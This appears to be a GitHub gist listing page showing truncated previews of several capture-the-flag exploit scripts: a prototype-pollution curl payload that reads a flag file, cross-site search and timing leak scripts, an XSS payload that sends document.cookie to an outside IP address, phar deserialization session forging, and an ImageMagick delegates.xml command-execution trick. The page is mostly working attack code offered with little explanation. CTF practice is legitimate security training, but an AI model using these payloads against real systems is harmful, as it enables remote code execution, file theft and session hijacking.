Skip to content

Instantly share code, notes, and snippets.

View angular-of-universe.md

flag 1 (Bypass path restriction with Angular router)

If you can render /debug/answer in server-side, you can get the first flag.

Nginx denies accesses to /debug.

  location /debug {
    # IP address restriction.
    # TODO: add allowed IP addresses here
View exploit.sh
curl http://10.13.37.$i:14017/config/validated/json-schema/validate -H 'content-type: application/json' --data '{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"outputFunctionName":{"type":"string","default":"x;var buf = Buffer.alloc(128);var fs = process.mainModule.require(`fs`);var fd=fs.openSync(`/fl`+`ag`);fs.readSync(fd, buf, 0, 128);fs.closeSync(fd);return buf.toString();//x"},"path":{"type":"string","default":"/foo"}}}}}}'
View gist:6cedcff95fa3afcb06963dffef57c542
<script>
setTimeout(() => {
(new Image()).src='/start';
var start = performance.now();
fetch("https://www.materialui.co/materialIcons/navigation/close_black_72x72.png", {
mode: "no-cors",
credentials: "include"
}).then((response) => {
var end = performance.now();
View hugo-export-with-wp-syntax.diff
1a2
>
222,223d222
< do_action('wp_print_scripts');
<
225,228d223
<
< # remove theCode
< $content = preg_replace('/<p class="theCode[^<]+<\/p>/', '', $content);
<
View api.sh
#!/usr/local/bin/zsh
command=(
#cookie "PHPSESSID" "rsha06bn3700l9jtvpvsottf7q"
#header "Content*" "compressed"
header "HTTP/ 999 " "found"
#header "HTTP/0.9 " "OK"
#header "Connection" "close"
body "<script\r\n>location.href='//35.209.128.35:12345/?'+document.cookie\r\n</script" b
hello 1 1
View bruteforce.py
#!/usr/bin/env python3
import random
import sys
FLAG_LENGTH = 42
OPS_CURSOR = 0
RESULT_CURSOR = 0
TIME = 157763354
View secret-note-keeper.php
<?php
$prefix = "";
if ($_GET["prefix"]) { $prefix = $_GET["prefix"]; }
for ($i = 20; $i <= 126; $i++) {
echo "<iframe id='" . chr($i) . "' src='http://challenges.fbctf.com:8082/search?query=fb%7b" . urlencode($prefix . chr($i)) ."'></iframe>";
}
?>
<script>
Array.from(document.querySelectorAll('iframe')).forEach(f => {
View avater-uploader-2
IMAGE=$(curl http://153.127.202.154:1002/upload.php -F "file=@test4.phar.png" -vvv 2>&1 | grep Set-Cookie | sed -r 's/^.*session=([^.]+).*$/\1/' | base64 -d 2>/dev/null | sed -r 's/^.*avatar":"([^"]+).*$/\1/')
echo $IMAGE
wget http://153.127.202.154:1002/uploads/$IMAGE
node -e "function btoa(str) { var buffer; if (Buffer.isBuffer(str)) { buffer = str; } else { buffer = new Buffer(str.toString(), 'binary'); } return buffer.toString('base64');};console.log('session=' + btoa('{\"name\":\"AAAAAAAAAAAAAAAA\",\"flash\":{\"type\":\"error\",\"message\":\"Uploaded file is not PNG format.\"},\"theme\":\"phar://./uploads/$IMAGE/exploit\"}').replace(/=/g,'') + '.JDJ5JDEwJC5LS1h0UnlUbC5OeHhWVHdFRXovZ095N2taU3NPTXBhTDRnMi4yNXkwMnQ3eHp1dW16SzVt')" > cookie
COOKIE=$(cat cookie)
echo $COOKIE
View wallbreaker.php
<?php
$home = '/tmp/84d99af2ce44bb1dd3398190b930c8ac';
ini_set('display_errors', 1);
mkdir("$home/.magick/");
file_put_contents("$home/.magick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>");
mkdir("$home/.config/");
mkdir("$home/.config/ImageMagick");
file_put_contents("$home/.config/ImageMagick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>");
touch("$home/test.foo");
$_ENV['HOME'] = $home;
You can’t perform that action at this time.